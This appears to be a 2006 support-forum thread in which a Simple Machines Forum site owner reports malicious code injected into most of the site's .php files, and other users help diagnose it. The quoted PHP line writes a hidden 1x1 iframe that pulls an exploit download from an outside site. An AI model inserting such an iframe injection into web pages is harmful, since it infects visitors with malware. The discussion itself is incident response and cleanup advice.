Vain teksti | Teksti ja kuvat

Simple Machines Community Forum

Customizing SMF => SMF Coding Discussion => Aiheen aloitti: joeshmo - tammikuu 04, 2006, 04:28:41 IP

Otsikko: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: joeshmo - tammikuu 04, 2006, 04:28:41 IP
It added an extra bit of code to almost every .php page that triggers a virus download from another site. check it out here: *linksnipped*
Koodi [Valitse]
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>

The link in the above sends you a virus download that looks like it came from our site. Help please! We did not have this problem in any past version of smf and it doesnt look like anything is already on the forums.
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: Skipdawg - tammikuu 04, 2006, 06:23:17 IP
Do not click on his link if you don't have a very good and solid firewall and antivirus!

Took me about 5 minutes to clean up the mess. That board should be disabled till problem fixed!
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: Trekkie101 - tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: sg3524 - tammikuu 04, 2006, 06:28:07 IP
This is absolutely not coming from your RC2 code.  It may exist elsewhere on your site though.

Its a popular form of attack now taking place out there.  Look for .htaccess files that have been modified, or that you did not put there.

Let me know if you find any.  I can give you some hints about how to protect yourself.

GRAM
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: Thantos - tammikuu 04, 2006, 06:31:32 IP
Lainaus käyttäjältä: Trekkie101 - tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: Trekkie101 - tammikuu 04, 2006, 06:35:22 IP
Lainaus käyttäjältä: MikeMill - tammikuu 04, 2006, 06:31:32 IP
Lainaus käyttäjältä: Trekkie101 - tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.

lol no, I meant the next patch, windows update.

Firefox, Opera arent affected unless you choose to save it.
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: Trekkie101 - tammikuu 04, 2006, 06:40:48 IP
Ive tracked through all the iframes, and reported the site to the webhost. www.ev1.net

Hopefully their abuse center will deal with it.
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: joeshmo - tammikuu 04, 2006, 07:15:10 IP
Yeah, sorry bout the link. Firefox opens a zillion downloads called password.wmf . I made the area off limits to all users to prevent people from getting a virus.
Htdocs dont appear to be changed. It just says this really:

Lainaa<Files 403.shtml>
order allow,deny
allow from all
</Files>

I really dont see anything changed, though I am changing my password for safety and stuff. Should I just upload smf rc2 again?
Otsikko: Re: Hmm, seems to be a virus when we updated to smf rc2
Kirjoitti: JayBachatero - tammikuu 04, 2006, 08:37:02 IP
I think you should just wait until it's cleared or it will continue to happen.

-JayBachatero
Vain teksti | Teksti ja kuvat